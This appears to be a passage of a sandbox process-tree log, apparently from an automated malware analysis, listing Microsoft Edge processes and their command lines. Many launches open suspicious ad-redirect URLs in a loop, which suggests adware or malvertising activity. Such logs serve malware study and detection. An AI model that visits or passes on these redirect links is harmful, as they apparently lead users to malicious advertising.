"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=159 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10788 /prefetch:1
14⤵
PID:29012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=12312 /prefetch:8
14⤵
PID:29980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=161 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11124 /prefetch:1
14⤵
PID:26260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=162 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11988 /prefetch:1
14⤵
PID:28416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=163 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12640 /prefetch:1
14⤵
PID:29316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=164 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13136 /prefetch:1
14⤵
PID:32944

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
13⤵
PID:13668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:13688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
13⤵
PID:14616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:14636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
13⤵
PID:15408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:15428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
13⤵
PID:16160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:16180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
13⤵
PID:17140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:17160

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
13⤵
PID:20096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:20124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
13⤵
PID:21344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:21364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
13⤵
PID:22404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:22424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1339680
13⤵
PID:23376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:23396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=3
13⤵
PID:24272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x4c,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:24292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1343178
13⤵
PID:25020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0x108,0x118,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:25052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
13⤵
PID:25800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:25820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466
13⤵
PID:26808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:26832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
13⤵
PID:30628

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:30656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
13⤵
PID:31756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:31776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
13⤵
PID:32748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:32776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
13⤵
PID:33544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:33572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
13⤵
PID:34568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:34588

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
13⤵
PID:35420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:35440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
13⤵
PID:36688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:36708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=3
13⤵
PID:37508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:37528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1343177&var=3
13⤵
PID:38252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:38272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1339680
13⤵
PID:39168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:39196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1620783&var=3
13⤵
PID:6468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:39952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1343178
13⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ff8fe6846f8,0x7ff8fe684708,0x7ff8fe684718
14⤵
PID:1272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465
13⤵
PID:1960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
